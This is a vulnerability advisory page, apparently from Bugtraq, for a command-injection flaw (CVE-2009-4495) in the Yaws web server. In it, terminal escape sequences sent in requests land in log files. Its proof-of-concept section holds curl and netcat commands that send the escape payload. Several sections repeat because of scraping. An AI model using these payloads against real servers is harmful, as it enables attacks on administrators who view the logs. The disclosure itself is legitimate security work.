Yaws Terminal Escape Sequence in Logs Command Injection Vulnerability
BID:37716
Info
Yaws Terminal Escape Sequence in Logs Command Injection Vulnerability
| Bugtraq ID: | 37716 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-4495 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 11 2010 12:00AM |
| Updated: | Jan 11 2010 12:00AM |
| Credit: | Giovanni 'evilaliv3' Pellerano, Alessandro 'jekil' Tanasi, and Francesco 'ascii' Ongaro |
| Vulnerable: |
Yaws Yaws 1.55 Yaws Yaws 1.54 Yaws Yaws 1.52 Yaws Yaws 1.51 Yaws Yaws 1.50 Yaws Yaws 1.85 Yaws Yaws 1.80 Yaws Yaws 1.79 |
| Not Vulnerable: | |
Discussion
Yaws Terminal Escape Sequence in Logs Command Injection Vulnerability
Yaws is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.
Attackers can exploit this issue to execute arbitrary commands in a terminal.
Yaws 1.85 is vulnerable; other versions may also be affected.
Yaws is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.
Attackers can exploit this issue to execute arbitrary commands in a terminal.
Yaws 1.85 is vulnerable; other versions may also be affected.
Exploit / POC
Yaws Terminal Escape Sequence in Logs Command Injection Vulnerability
Attackers can exploit this issue with readily available tools.
The following example is available:
curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload
Attackers can exploit this issue with readily available tools.
The following example is available:
curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload
Solution / Fix
Yaws Terminal Escape Sequence in Logs Command Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Yaws Terminal Escape Sequence in Logs Command Injection Vulnerability
References:
References: